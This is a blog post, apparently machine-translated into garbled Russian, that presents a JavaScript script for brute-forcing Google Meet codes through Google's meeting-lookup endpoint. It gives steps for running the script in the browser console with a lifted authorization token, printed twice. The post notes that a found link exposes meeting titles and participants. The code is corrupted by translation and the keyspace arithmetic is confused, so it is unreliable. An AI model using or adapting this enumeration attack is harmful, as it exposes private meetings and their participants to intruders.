Visio – застрять в Google Meet | Dyrk, Dyna Meet – Visio

July 30, 2023 0 Comments Электронный

Познакомьтесь с Visio

Contents

1 Познакомьтесь с Visio
- 1.1 Dyrk
- 1.2 Познакомьтесь с Visio

Рандомизировать = () => dico = dico.Расколоть (”).Карта (значение => (< value, sort: Math.random() >))).заклинание ((a, b) => a.заклинание – б.заклинание).КАРТА ((< value >) => значение).Присоединиться (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Расколоть (”).Карта (c => c == ‘-‘?C: строка.FromCharcode (Math.Пол (математика.Случайный ()*25) +97)).Присоединиться (”),
Key = newPatternKey (), счетчик = 20;
Next = () => Ключ.Расколоть (”).Карта (e => e == ‘-‘ ? E: DICO [DICO.Indexof (e) + 1> = DICO.длина ? 0: Дико.Indexof (e) + 1]).Присоединиться (”),
Счетчик = 0;
MeetLink = ‘https: // встретиться.Google.com/’, доступный toe = () => xhr = new xmlhttprequest ();
If (счетчик ++> = 20) счетчик = 0;
Key = newPatternKey ();
Рандомизировать ();
>
Key = Next ();
xhr.Open (‘Get’, MeetLink + Key);
xhr.AddEventlisner (‘Load’, (e) => fetch (MeetLink.concat (“/$ rpc/google.RTC.Встречи.V1.MeetingsPacesservice/ResolvemeetingSpace »),« Заголовки »:« Авторизация »: авторизация,
“Контент-тип”: “Application/x-protobuf”,
“X-goog-adep-key”: E.цель.ответственность.Match (/\ [“https \: \/\/meet \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-Goog-Authuse”: “0”,
“X-goog-ecode-respose-if-executible”: “base64”,
“X-Goog-Meeting-идентификатор”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (ключ)),
>,
“Body”: “\ n \ f”.Concat (ключ, “0 \ u0001”),
“Метод”: “Пост”
>).тогда (e => e.Text ())
.затем (e => settimeout (доступно, 100);
консоль.Log (Meetlink.Concat (ключ).BuestifyDisplay (38), (E.Заменить (/[^a-za-z0-9]/g, “”)+””).BuestifyDisplay (38));
>);
>);
xhr.Отправлять ();
>;
Нить.опытный образец.BuestifyDisplay = function (размер) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >размер ? ТЕКСТ.Длина: размер)).Substr (0, размер).Concat (‘|’); >,
консоль.Прозрачный ();
доступный ();
>) ()

Dyrk

В настоящее время работая в области кибербезопасности, я регулярно сталкиваюсь с довольно тривиальными ситуациями.

Последнее, вторжение человека во время встречи .
К счастью, для безопасности Google Meet включила функцию, позволяющую обоим, чтобы предупредить участников, что человек стремится присоединиться к видеоконференции, но также принять или отказаться от нее.

Однако это событие заставляет меня задать себе несколько вопросов .

Сложность ссылки на встречу Google

Прежде всего, как человек может подключиться к ссылке на встречу, не будучи приглашенным к ней ?

Мы должны рассмотреть простоту ссылки: https: // Google.встретиться.ком/Xxx -yyyy -ззо

Xxx -yyyy -ззо только алфавитные символы между A и Z, т. 27 возможных комбинаций для каждого персонажа.

Для математиков есть:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 Возможные комбинации .

Срок службы срока службы Google Meet

Хотя теперь мы можем лучше понять, как строятся ссылки наших облигаций “Google Meet”, существует очень важный аспект, который следует учитывать . Срок жизни ссылки на Google Meet !

Действительно, каждый может генерировать встречи Google Meetings за несколько кликов.
Но через несколько дней, недели или месяцы . Ссылки больше не действительны.

Следовательно, сгенерированные ссылки имеют определенный период достоверности .

Исключение делает «повторяющиеся» события, и именно здесь это становится интересным.
В бизнесе есть много возможностей для регулярной организации (команда / бизнес, ежедневно, еженедельно, ежемесячно,, . ))).
Когда сотрудник генерирует этот тип события в своей повестке дня, автоматически генерируется ссылка на Google Meet. Это неизбежно.
Таким образом, у вас будет одна и та же ссылка каждый раз для этого события.

С небольшим JavaScript и грубой силой ?

Со всеми этими элементами мы теперь оборудованы для того, чтобы подметать все возможности и достичь высоких вероятностей, чтобы обнаружить ссылки на видеоконтролируемые !

Таким образом, у меня есть небольшая ретро-застрахованная работа Google Meet, чтобы написать код JavaScript, который попробует бесконечное количество комбинаций

(В) Dyrk.Org 2023-2024 – Рулетка встреч
(1) Запустите этот скрипт на https: // Google.встретиться.компонент

(2) Найти и обновить переменную авторизации с помощью токена действительного авторизации в заголовках «Запросы XHR» в Googles

Пусть Authorization = “Sapisidhash xxxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” AbcDefghijklmnopqrStuvxz “,

Рандомизировать = () => dico = dico.Расколоть (”).Карта (значение => (< value, sort: Math.random() >))).заклинание ((a, b) => a.заклинание – б.заклинание).КАРТА ((< value >) => значение).Присоединиться (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Расколоть (”).Карта (c => c == ‘-‘?C: строка.FromCharcode (Math.Пол (математика.Случайный ()*25) +97)).Присоединиться (”),
Key = newPatternKey (), счетчик = 20;
Next = () => Ключ.Расколоть (”).Карта (e => e == ‘-‘ ? E: DICO [DICO.Indexof (e) + 1> = DICO.длина ? 0: Дико.Indexof (e) + 1]).Присоединиться (”),
Счетчик = 0;
MeetLink = ‘https: // встретиться.Google.com/’, доступный toe = () => xhr = new xmlhttprequest ();
If (счетчик ++> = 20) счетчик = 0;
Key = newPatternKey ();
Рандомизировать ();
>
Key = Next ();
xhr.Open (‘Get’, MeetLink + Key);
xhr.AddEventlisner (‘Load’, (e) => fetch (MeetLink.concat (“/$ rpc/google.RTC.Встречи.V1.MeetingsPacesservice/ResolvemeetingSpace »),« Заголовки »:« Авторизация »: авторизация,
“Контент-тип”: “Application/x-protobuf”,
“X-goog-adep-key”: E.цель.ответственность.Match (/\ [“https \: \/\/meet \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-Goog-Authuse”: “0”,
“X-goog-ecode-respose-if-executible”: “base64”,
“X-Goog-Meeting-идентификатор”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (ключ)),
>,
“Body”: “\ n \ f”.Concat (ключ, “0 \ u0001”),
“Метод”: “Пост”
>).тогда (e => e.Text ())
.Тогда (e =>

SetTimeout (доступно, 100);
консоль.Log (Meetlink.Concat (ключ).BuestifyDisplay (38), (E.Заменить (/[^a-za-z0-9]/g, “”)+””).BuestifyDisplay (38));
>);
>);
xhr.Отправлять ();
>;
Нить.опытный образец.BuestifyDisplay = function (размер) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >размер ? ТЕКСТ.Длина: размер)).Substr (0, размер).Concat (‘|’); >,
консоль.Прозрачный ();
доступный ();
>) ()

Чтобы управлять всем этим, это будет необходимо:

Откройте страницу https: // встреча.Google.компонент
Откройте консоли разработчика
На вкладке «Сеть» отфильтруйте Fetch / XHR и восстановите токен токена“Авторизация”
Скопируйте и вставьте исходный код выше и поместите в место, указанное токен.
Проверьте ключ «вход» на клавиатуре.

Восстановление токена «авторизации»:

Для любопытного, это то, как должен выглядеть результат этого сценария в действии.
Поэтому мы отмечаем строки, которые сообщают нам, что пространство для видеоконференции не существует.
И другие, которые подняли нас в знак конференции ! Поэтому указывает на то, что ссылка действительна;)

Тем не менее, не ожидайте упасть через несколько секунд по ссылке Meet ^^
(Если только вам не повезло)
Вам нужно быть большим терпением, позволяя ему работать не менее полчаса.

Заключение

Не паникуйте, что есть больше удачи, чтобы найти действительную ссылку Google Meet, чем выиграть Loto.

Внимание ! Человек, который сталкивается с действующей ссылкой, доступа к определенной информации без необходимости подключения:
Название встречи (поэтому избегайте скольжения конфиденциальной информации) и подключенных участников (все или игра).

Познакомьтесь с Visio

Онлайн ограбление

Бестселлер наклейка онлайн ограбление

игроки